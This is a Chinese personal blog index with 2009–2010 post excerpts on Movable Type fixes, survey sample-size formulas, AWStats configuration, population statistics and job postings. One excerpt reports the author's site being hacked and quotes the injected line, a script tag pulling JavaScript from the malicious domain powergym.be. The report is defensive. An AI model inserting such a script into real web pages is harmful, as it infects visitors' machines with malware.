2010年08月01日

MT上“Name "Locale::Maketext::Lexicon" used only once:” 问题的解决: 改用Perl内置函数库

最近从服务器日志中经常发现MT的错误日志:
Name "Locale::Maketext::Lexicon" used only once: possible typo at
.../extlib/Locale/Maketext.pm line 653.,....

解决方法:
删除 mt/extlib/目录下的I18N/ 和 Locale/ 目录即可;

原因:
服务器上已经升级到Perl 5.10.x了: 很多国际化字符集方面的支持直接使用Perl内置的支持包即可。
[chedong@titans ~/logs/chedong.com/http]$ perl -v

This is perl, v5.10.0 built for x86_64-linux-gnu-thread-multi

Copyright 1987-2007, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

按此阅读全文 "MT上“Name "Locale::Maketext::Lexicon" used only once:” 问题的解决: 改用Perl内置函数库" »

2010年07月17日

如何确定抽样统计的最小样本量(附:随机抽样统计的抽样误差Excel计算表格)

在电视节目中经常看到关于选举的报道中经常会后有支持率的数字,例如:调查结果为

  • a方支持率为45.3%;
  • b方支持率为30.2%;
  • c方支持率为8.5%;
  • ...

最后都会说明一下,此次电话调查的数量2352,置信度为95%﹐最大容许误差为±2.5%,这就是抽样调查的典型情景:一个大的集合(比如:数千万选民)做一次调查的成本较高,抽样调查可以低成本的用近似的(可接受的)数据反映实际情况;在用户调研中,也经常通过通过抽样调查的方式并对比打分的方法做评估。

抽样误差: 假如相同规模的抽样调查进行多次, 抽样均值在真实均值的上下波动,相对于整体均值的偏移波动就是抽样误差,而这个误差的分布是符合标准正态分布的,例如下图: 横轴为整体的均值,圆点是每次抽样的均值,而红色那次抽样就是加上误差后都未覆盖到均值线的情况); 

 

最小抽样量的计算公式: 抽样量需要 > 30个才算足够多,可以用以下近似的误差/样本量估算公式;

n: 为样本量;
\fn_jvn \120dpi {\sigma}^2方差,抽样个体值和整体均值之间的偏离程度,抽样数值分布越分散方差越大,需要的采样量越多;
E: 为抽样误差(可以根据均值的百分比设定),由于是倒数平方关系,抽样误差减小为1/2,抽样量需要增加为4倍;
\fn_jvn \120dpi ^{z_{\alpha/2}}: 为可靠性系数,即置信度,置信度为95%时,\fn_jvn \120dpi ^{z_{\alpha/2}}=1.96,置信度为90%时,\fn_jvn \120dpi ^{z_{\alpha/2}}=1.645,置信度越高需要的样本量越多;95%置信度比90%置信度需要的采样量多40%;

为了体现相对差距: 假设抽样均值为 y

相对抽样误差 h = E / y

变异系数 C= σ / y


以下是基于抽样得分的抽样误差估算表格: 方差越大需要的样本量越多,数据离散度越低,需要的抽样量越少;

置信度相对抽样误差(假设:C=0.4)
1%2%3%4%5%
95%6147 1537 683 384 246 
90%4330 1082 481 271 173 

如果是基于胜出率,支持率等: 分值为0/1状态分布,公式拟合为

 

π为按照经验得出的最后比例,在未知时π可取50%,待算出结果后再重新拟合,比例越悬殊需要的样本量越少; 

 

置信度相对抽样误差
1%2%3%4%5%
95%960424011067600384
90%67651691752423270

从而看出大部分的电话抽样调查:95%置信度的情况下,误差要控制在2%以内取样量一般在2000-5000;为了方便计算抽样调查的误差和估算抽样量,制作了一个Excel表格附后,调整颜色框中的抽样量数字就可以得到相应的误差或根据指定的误差范围估算出抽样量;

按此阅读全文 " 如何确定抽样统计的最小样本量(附:随机抽样统计的抽样误差Excel计算表格)" »

2010年06月05日

AWStats 7.0 发布, Linux下的安装配置使用备忘

5月25日,Eldy发布了AWStats的7.0版本,从界面上看主要的变化是很多统计图使用了Google图表API生成;
awstats_70_googlechartapi.png

在Linux的安装请参考AWStats安装笔记, 此次更新后的相关配置修改都放到补充库里了;
包含chedong.com的awstats配置样例:awstats.chedong.conf
通用配置文件样例: coommon.conf
搜索引擎和蜘蛛定义更新: robots.pm search_engines.pm (需要放到lib目录下)

缺省建议启用的配置:common.conf
LoadPlugin="tooltips"
LoadPlugin="decodeutfkeys"
LoadPlugin="graphgooglechartapi"
LoadPlugin="geoip GEOIP_STANDARD /home/chedong/chedong.com/cgi-bin/awstats/GeoIP.dat"
LoadPlugin="geoip_city_maxmind GEOIP_STANDARD /home/chedong/chedong.com/cgi-bin/awstats/GeoLiteCity.dat"
LoadPlugin="qqhostinfo"

搜索引擎定义主要去掉了一些门户网站的域名(例如: 163.com live.com),避免了搜索服务和门户其他服务(例如: 博客)容易和搜索来源混淆的情况。
蜘蛛定义主要增加了feed抓取机器人:
'sosospider','SosoSpider',
'youdaobot','YoudaoBot',
'doubanbot','DoubanBot',
'friendfeedbot','FriendFeedBot',

AWStats 7.0的详细ChangeLog更新附后:

按此阅读全文 "AWStats 7.0 发布, Linux下的安装配置使用备忘" »

2010年05月24日

[招聘] 中文的LinkedIn项目招聘服务器端Linux开发和Windows客户端开发

创业者实在太低调了,不想透露太多。 感兴趣的同学请看后面的详细说明:

按此阅读全文 "[招聘] 中文的LinkedIn项目招聘服务器端Linux开发和Windows客户端开发" »

2010年04月05日

在Dreamhost遭遇挂马: powergym.be

4月1日中午,有朋友发来邮件: 访问 chedong.com 的页面时;
该网站可能含有恶意软件,有可能会危害您的电脑。
http://www.google.com.hk/interstitial?url=http://www.chedong.com/

到Google的诊断页看了一下:

我们过去 90 天内对此网站上的 2 张网页进行了测试,发现有 1
张网页在未经用户同意的情况下就会将恶意软件下载并安装到用户的机器中。Google 上次访问此网站的日期是
2010-03-31,上次在此网站中发现可疑内容的日期是 2010-03-30。
Malicious software includes 2 exploit(s). Successful infection
resulted in an average of 1 new process(es) on the target machine.
恶意软件托管在 3 个域上,其中包括 surrogaty.uz.ua/, abseconbluedevils.org/, powergym.be/。
2 个域以传播媒介的身份向此网站的访问者散发了恶意软件,其中包括 abseconbluedevils.org/, help2strike.org.ua/。
This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

登录到服务器上:
grep -R powergym *
发现数十个目录缺省页 index.html index.php default.html 全部在3月30日被附加了这样一行script:
script language='JavaScript' src='http://powergym.be/xxxxss36dj.js'

回家后断断续续折腾了2天,终于将大部分目录回滚到了3月30日之前;近期还在和DreamHost联系,查看系统登录日志,查看各个目录下的应用安装情况;

按此阅读全文 "在Dreamhost遭遇挂马: powergym.be" »

2010年02月09日

中国人口年龄构成统计 2007 - 2100

最近刚看完《异类》一书:其中讲了有所成就的人士除了10,000小时定律之外很重要的(而且经常被人们忽视的)一个因素就是人口的变化。因此也额外对人口变化趋势非常关注,高巍为此做了一个星座和中国人口出生量的统计。 我看到一个人口构成数字是清议在《可预见的中国式灾难》中引用的田雪原《中国人口预测结果》(原始出处未找到)人口年龄统计:制成图表如下
中国人口年龄构成统计 2007 - 2100
原始数据表格列表如下(单位:万人):
年份       总人口	0~14岁	15~64岁	65岁以上 新增劳动人口 抚养比	
2007年	132,129 	25,633 	95,794 	10,702 	2,142 	37.9%	2007年实际值
2008年	132,978 	24,911 	96,938 	11,129 	2,119 	37.2%	
2009年	133,634 	24,524 	97,713 	11,397 	2,072 	36.8%	
2010年	134,279 	24,289 	98,301 	11,688 	2,076 	36.6%	
2011年	134,916 	24,093 	98,807 	12,016 	2,046 	36.5%	抚养比谷底
2012年	135,543 	23,994 	99,152 	12,397 	1,949 	36.7%	
2013年	136,144 	23,943 	99,401 	12,801 	1,840 	37.0%	
2014年	136,706 	23,941 	99,465 	13,300 	1,776 	37.4%	
2015年	137,213 	23,657 	99,682 	13,875 	1,706 	37.7%	
2016年	137,652 	23,305 	99,918 	14,430 	1,650 	37.8%	
2017年	138,014 	22,980 	99,920 	15,114 	1,602 	38.1%	劳动人口峰值
2018年	138,294 	22,671 	99,800 	15,823 	1,597 	38.6%	
2019年	138,491 	22,365 	99,534 	16,592 	1,619 	39.1%	
2020年	138,614 	22,059 	99,170 	17,386 	1,587 	39.8%	
2021年	138,668 	21,735 	98,852 	18,080 	1,597 	40.3%	总人口峰值
2022年	138,658 	21,390 	98,466 	18,803 	1,608 	40.8%	
2023年	138,592 	21,018 	98,140 	19,434 	1,620 	41.2%	
2024年	138,471 	20,617 	98,107 	19,748 	1,626 	41.1%	
2025年	138,301 	20,186 	98,102 	20,012 	1,635 	41.0%	
2026年	138,082 	19,722 	98,349 	20,011 	1,641 	40.4%	65岁以上超过14岁以下人口
2027年	137,813 	19,228 	98,220 	20,365 	1,648 	40.3%	
2028年	137,493 	18,716 	97,140 	21,637 	1,654 	41.5%	抚养比之后每年上升一个百分点
2029年	137,123 	18,202 	96,157 	22,764 	1,658 	42.6%	
2030年	136,705 	17,701 	95,221 	23,783 	1,654 	43.6%	
2031年	136,239 	17,228 	94,226 	24,786 	1,654 	44.6%	
2032年	135,729 	16,799 	93,359 	25,571 	1,655 	45.4%	
2038年	131,793 	15,175 	85,651 	30,967 	1,383 	53.9%	
2048年	121,682 	13,546 	75,791 	32,345 	1,345 	60.5%	
2050年	119,163 	13,116 	73,701 	32,346 	1,331 	61.7%	
2060年	105,064 	10,605 	61,285 	33,174 	1,239 	71.4%	
2085年	71,256 	7,065 	40,042 	24,149 	  898 	78.0%	抚养比峰值
2100年	55,647 	5,596 	31,621 	18,430 	  601 	76.0%

按此阅读全文 "中国人口年龄构成统计 2007 - 2100" »

2009年12月22日

AWStats的自定义扩展统计:Using the Extra Sections features

如何利用AWStats针对网站自身应用进行特定参数的统计,今天学习了一下:AWStats Documentation - Using the Extra Sections features。文档中主要有以下几个例子:
# Example 1: Tracking Product orders
跟踪商品订单:解析出GET /cgi-bin/order.cgi?productid=49&session=A0B1C2 中的productid=字段
# Example 2: Tracking Bugzilla most frequently viewed bugs
跟踪bugzilla中最经常被访问的Bug:原理同上,这在内部开发中非常有用,类似的,也很容易给BBS系统配置出最常访问的论坛等统计。
# Example 3: Tracking Exit clicks
跟踪用户离开当前网站的点击:前提是你将所有指向其他网站的链接通过/cgi-bin/awredir.pl?url=http://externalsite/pagelinked这样的链接进行部署。
# Example 4: Tracking aborted download
跟踪中断的下载:利用的是HTTP返回的状态码206 ExtraSectionCodeFilter1="206"
# Example 5: Tracking most requested domain aliases
跟踪最常用的域名别名:这需要在日志中部署并定义扩展字段%your_extra_field,然后在ExtraSestion中部署统计相应的扩展字段%your_extra_field 这里的例子就是将域名的别名,在一个域名有多个别名的时候,分析那个域名最常用最有帮助。
# Example 6: List of top level 2 path under a directory /mydir
跟踪某个目录下最常访问的2级子目录,根据样例设置了一个 /tech /blog 2个目录下的TOP文章统计。

按此阅读全文 "AWStats的自定义扩展统计:Using the Extra Sections features" »

2009年09月20日

中国每年出生人口数 1976年 - 2000年 历年男女性别比

2010-01-06_201125.png 感谢高巍
      年份       比例        总数               男             女
1976年出生 50.92%  20,491,797  10,435,196  10,056,601
1977年出生 50.86%  17,931,155   9,119,685   8,811,470
1978年出生 50.55%  18,831,591   9,519,345   9,312,246
1979年出生 50.45%  18,924,822   9,548,059   9,376,763
1980年出生 50.64%  18,393,809   9,315,481   9,078,328
1981年出生 51.00%  19,122,938   9,752,137   9,370,801
1982年出生 51.02%  23,100,427  11,786,950  11,316,732
1983年出生 51.21%  20,065,048  10,275,677  9,789,371
1984年出生 51.53%  20,313,426  10,468,201  9,845,225
1985年出生 51.88%  20,429,326  10,598,460  9,830,866
1986年出生 51.85%  23,190,076  12,023,710  11,166,366
1987年出生 53.87%  25,282,644  13,619,530  12,663,114
1988年出生 52.00%  24,576,191  12,779,621  11,796,570
1989年出生 52.16%  25,137,678  13,110,848  12,026,830
1990年出生 52.69%  26,210,044  13,811,030  12,399,014
1991年出生 53.16%  20,082,026  10,674,963  9,407,063
1992年出生 53.40%  18,752,106  10,014,222  8,737,884
1993年出生 53.53%  17,914,756   9,590,414   8,324,342
1994年出生 53.83%  16,470,140   8,866,012   7,604,128
1995年出生 54.08%  16,933,559   9,157,597   7,775,962
1996年出生 54.24%  15,224,282   8,257,145   6,967,137
1997年出生 54.64%  14,454,335   7,897,234   6,557,101
1998年出生 54.97%  14,010,711   7,701,684   6,309,027
1999年出生 55.09%  11,495,247   6,332,425   5,162,822
2000年出生 54.08%  13,793,799   7,460,206   6,333,593

按此阅读全文 "中国每年出生人口数 1976年 - 2000年 历年男女性别比" »

2009年08月10日

[搜狗招聘] 搜狗搜索引擎 产品专员 欢迎实习生

如果您是做开发的请移步这里

搜狗招聘:网站产品部搜索产品经理
抽点时间先做个测试吧:看看你是否适合做一个合格的搜索产品专员:
1、你经常使用各种搜索引擎吗?
A. 没错,岂止是经常,搜索引擎就是我上网的必备工具,找任何东西我都想先搜一下。
B. 经常用,不过只是用一些网页、MP3搜索之类的,而且基本只去那两三个有名的搜索引擎。
C. 不常用,网上信息来源很丰富,不是一定要用搜索引擎的。
D. 用得较少,甚至——搜索引擎是干什么的来着?我怎么没听说过?更别说用了...

2、你关心互联网的产品、应用和技术吗?对于比较知名的所谓Web2.0网站,你经常去的有多少?
A. 非常关心互联网的产品和应用,web2.0的提法太笼统了,我经常去光顾的随便就列出十个八个,而且我在AAA网站上是版主,在BBB网站上级别很高。
B. 一直关心互联网,web2.0我也比较了解,我知道的这样的网站有很多,不过有时间就会去看一下的只有五六个,自己会经常参与其中的还要更少一些。
C. 比较关心互联网,web2.0我也知道是什么意思,不过我经常去的这类网站只有两三个,大多数情况也只是浏览一下看看热闹而已。
D. 互联网我当然知道,不能说关心,关心了也没用呀,也没人会因为我关心给我发工资。Web2.0是什么意思?等我上网查一下或者明早问问旁边坐着的小刘吧。

3、对于互联网产品的设计和用户体验,你经常有独特的想法吗?
A. 我经常比较各种不同网站内容功能和技术的优劣,也看过很多分析评论文章,设想如果自己是网站负责人,该如何改进功能,提升用户体验。比方说XXX网站,为什么不参考一下美国的YYY网站呢?你看那个MMM网站的这个功能,做得就很人性化,流量能迅速上升是有原因的。NNN网站实在是无话可说,完全就不知道用户需要什么。居然有VC肯投它,不可理喻...
B. 我常常自己去尝试一些网站的内容和功能,不仅仅是为了使用,而是想分析不同网站或功能的区别。不过我虽然大致明白他们的区别和优劣,但没有更多的想过怎么改进才能做得更好。
C. 我只是感到在XXX网站上都是我需要的内容,使用也很流畅,而在类似的YYY网站上就有点找不着北,去了两次我就不去了。但是我也没仔细想过为什么。
D. 我只是在用,没有多想。什么?你说XXX网站和YYY网站有区别?我怎么没感觉?真的,一点感觉都没有...

4、你有过互联网项目管理或产品管理的经历吗?擅长和不同角色,不同性格的人沟通吗?
A. 你问对人了。我最近这两三年一直做互联网的产品和项目,产品策划实施运营我很熟悉,我管的项目组人还挺多呢。交流和沟通也根本不是问题。
B. 我做过互联网有关的工作,虽然产品和项目经验不是很多,但我有很多idea,而且沟通也不成问题。
C. 我虽然没有做过互联网有关的工作,不过有其它领域的项目和产品管理经验,我想很多东西都是普遍联系的,而我又一直很关心互联网这个领域,互联网的产品/项目管理对我来说也不成问题。沟通也还可以吧,不是问题。
D. 我没有什么项目/产品管理经验。说起沟通和交流,我一直就有这个困惑,为什么别人总是不能领会我的意思呢?好多事别人做出来的结果和我想要的怎么就是不一样呢?

5、你是否了解一些基本的搜索和互联网技术?
A. 我就是学计算机出身的,最近几年也一直关心这个领域,自己做过一些东西,对搜索和互联网技术非常清楚,只要我愿意,找个工程师的工作一点没问题。
B. 我虽然不是学技术出身的,但是由于很关心这个领域,自学了很多东西,一些基本技术我自己实践过,对技术发展趋势也比较清楚。
C. 我大概知道一些,不过没怎么实践过。
D. 完全不清楚,我想很多人都和我一样,没什么大惊小怪的。

按此阅读全文 "[搜狗招聘] 搜狗搜索引擎 产品专员 欢迎实习生" »

2009年07月26日

百度蜘蛛支持crawl-delay/sitemaps/blog ping接口,Alexa增加Keywords/来源分析/用户构成

Baidu的API和google的完全相同,只是RPC的URL不同。Baidu的RPC服务URL 是

http://ping.baidu.com/ping/RPC2
具体提交参数可以参考:Google BlogSearch 服务的Ping接口文档。此外: Baidu蜘蛛也支持crawl-delaySitemaps协议。加上百度自有的阿拉丁格式接口,感觉内容网站和搜索引擎之间的交互接口越来越丰富了,结构化的数据提取和展现应该是通用搜索引擎的一个进化方向;

网站分析服务商Alexa最近也有不少面向站长很贴心的功能改进,虽然作为alexa反应总体流量趋势的能力越来越弱,但其中一些流量构成报告还是很有参考价值的:
1 搜索来源占总体流量比例;
2 搜索来源关键词;
3 流量来源分布: 包括搜索和内容链接;
4 用户构成,包括性别,年龄,教育,上网地点(工作/家里/学校),是否有小孩;

样例截图附后: 网站流量越大相对统计趋势会越准一些;

按此阅读全文 "百度蜘蛛支持crawl-delay/sitemaps/blog ping接口,Alexa增加Keywords/来源分析/用户构成" »

最近评论

Creative Commons(创作共用)授权
此 Blog 中的日记遵循以下授权 Creative Commons(创作共用)授权.
Powered by
Movable Type 3.36